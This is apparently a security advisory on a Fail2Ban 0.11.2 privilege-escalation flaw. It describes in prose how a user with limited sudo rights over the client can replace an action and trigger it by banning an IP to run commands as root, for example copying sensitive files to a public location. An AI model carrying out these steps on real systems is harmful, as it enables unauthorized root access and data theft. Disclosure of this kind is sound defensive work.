Fail2Ban Command Execution and Privilege Escalation Vulnerability

A vulnerability in Fail2Ban client version 0.11.2 allows users with limited sudo privileges to execute arbitrary commands as root. This issue arises from insecure permissions that enable the injection of malicious patterns into logged input, which Fail2Ban processes with elevated rights. The vulnerability can be exploited by manipulating log entries to execute unintended commands through Fail2Ban's action processing pipeline.

Impact

Exploitation of this vulnerability allows for command execution under the Fail2Ban runtime user, typically root, leading to unauthorized access and control over the system. It also enables modification of Fail2Ban rules, potentially bypassing bans or manipulating the service's behavior.

Reproduction

To reproduce this vulnerability, first ensure that Fail2Ban 0.11.2 is installed and running. The vulnerability can be exploited by a user who has sudo access to the Fail2Ban client. Begin by restarting the Fail2Ban service using the sudo command. Next, inject a malicious action into Fail2Ban that replaces an existing action with a command designed to execute unauthorized operations, such as copying sensitive files to a publicly accessible location. After setting the malicious action, trigger it by banning an IP address, which will execute the injected command. Finally, verify that the command was executed successfully by checking the destination where the file was supposedly copied.